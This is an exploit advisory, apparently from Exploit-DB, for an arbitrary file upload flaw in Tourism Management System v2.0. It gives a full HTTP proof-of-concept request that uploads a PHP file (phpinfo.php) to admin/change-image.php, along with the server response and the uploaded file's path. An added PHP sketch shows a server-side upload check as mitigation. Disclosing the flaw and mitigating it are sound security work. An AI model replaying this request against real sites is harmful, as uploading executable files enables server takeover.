

[webapps] Tourism Management System v2.0 - Arbitrary File Upload
source link: https://www.exploit-db.com/exploits/51923

# Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload
# Google Dork: N/A
# Exploit Author: SoSPiro
# Date: 2024-02-18
# Vendor Homepage: https://phpgurukul.com
# Software Link: https://phpgurukul.com/tourism-management-system-free-download/
# Version: 2.0
# Tested on: Windows 10 Pro
# Impact: Allows admin to upload all files to the web server
# CVE : N/A
# Exploit Description:
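The application is prone to arbitrary file upload because it fails to adequately sanitize user-supplied input. In the request below, the packageimage field of admin/change-image.php carries a file named phpinfo.php sent with an authenticated admin session, and the uploaded file's location is listed under admin/pacakgeimages/.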
# PoC request
POST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201
Content-Length: 361
Origin: http://localhost
Connection: close
Referer: http://localhost/zer/tms/admin/change-image.php?imgid=1
Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhv
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
X-PwnFox-Color: red

-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"
Content-Type: text/plain

<?php phpinfo();?>
-----------------------------390927495111779706051786831201
Content-Disposition: form-data; name="submit"

-----------------------------390927495111779706051786831201--
===========================================================================================
- Response -
HTTP/1.1 200 OK
Date: Sun, 18 Feb 2024 04:33:37 GMT
Server: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-dev
X-Powered-By: PHP/8.1.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 8146
============================================================================================
- File location -
http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php
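- Mitigation sketch (added example) -
The PHP below is an added example of the server-side check this upload path lacks; it is not code from the original advisory or from PHPGurukul. The function names, the 2 MiB size cap and the allowed image types are assumptions, and it requires PHP's fileinfo extension.

```php
<?php
// Added example, not PHPGurukul's code. Function names and the 2 MiB cap are assumptions.
const ALLOWED_IMAGES = [   // MIME type sniffed from content => extension the server assigns
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/** Return the extension to store the file under, or null if it must be rejected. */
function safe_image_extension(string $tmpPath, int $maxBytes = 2097152): ?string
{
    $size = @filesize($tmpPath);
    if ($size === false || $size === 0 || $size > $maxBytes) {
        return null;
    }
    // Sniff the type from the bytes; the client's filename and Content-Type are ignored.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($tmpPath);
    if (!is_string($mime) || !array_key_exists($mime, ALLOWED_IMAGES)) {
        return null;
    }
    // The bytes must also parse as an image header.
    if (@getimagesize($tmpPath) === false) {
        return null;
    }
    return ALLOWED_IMAGES[$mime];
}

/** Store one $_FILES entry under a server-generated name; return that name or null. */
function store_package_image(array $file, string $destDir): ?string
{
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'] ?? '')) {
        return null;
    }
    $ext = safe_image_extension($file['tmp_name']);
    if ($ext === null) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // never reuse the client filename
    return move_uploaded_file($file['tmp_name'], $destDir . '/' . $name) ? $name : null;
}

// Constructed sample: the PoC body is PHP text, not an image, so it is rejected.
if (PHP_SAPI === 'cli') {
    $tmp = tempnam(sys_get_temp_dir(), 'up');
    file_put_contents($tmp, '<?php phpinfo();?>');
    var_dump(safe_image_extension($tmp));
    unlink($tmp);
}
```

Content checks alone do not stop an image that has PHP appended to it; the server-assigned extension does, together with keeping uploads outside the web root or disabling script execution for the upload directory.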